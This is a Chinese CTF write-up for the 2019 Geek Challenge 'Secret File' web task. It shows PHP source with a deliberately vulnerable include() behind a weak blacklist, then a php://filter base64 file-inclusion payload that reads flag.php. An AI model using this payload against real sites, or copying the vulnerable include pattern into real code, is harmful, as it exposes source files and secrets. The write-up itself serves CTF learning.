[极客大挑战 2019]Secret File

Posted mech

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[极客大挑战 2019]Secret File相关的知识,希望对你有一定的参考价值。

 

查看源码得到Archive_room.php


技术图片

 

转到Archive_room.php


技术图片

 

点击SECRET后跳转到end.php,没有找到有用的信息。
burpsuite抓包,重放可得


技术图片

 

访问secr3t.php得到源码

 

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET[‘file‘];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

 

看到file与include,尝试伪协议读取flag.php
payload

secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

 

以上是关于[极客大挑战 2019]Secret File的主要内容,如果未能解决你的问题,请参考以下文章

[HCTF 2018]WarmUp&[极客大挑战 2019]Knife&[极客大挑战 2019]Secret File&[极客大挑战 2019]BuyFlag

[极客大挑战 2019]Secret File

buu-[极客大挑战 2019]Secret File

BUUCTF[极客大挑战2019]Secret File

[极客大挑战 2019]Secret File

[极客大挑战 2019]Secret File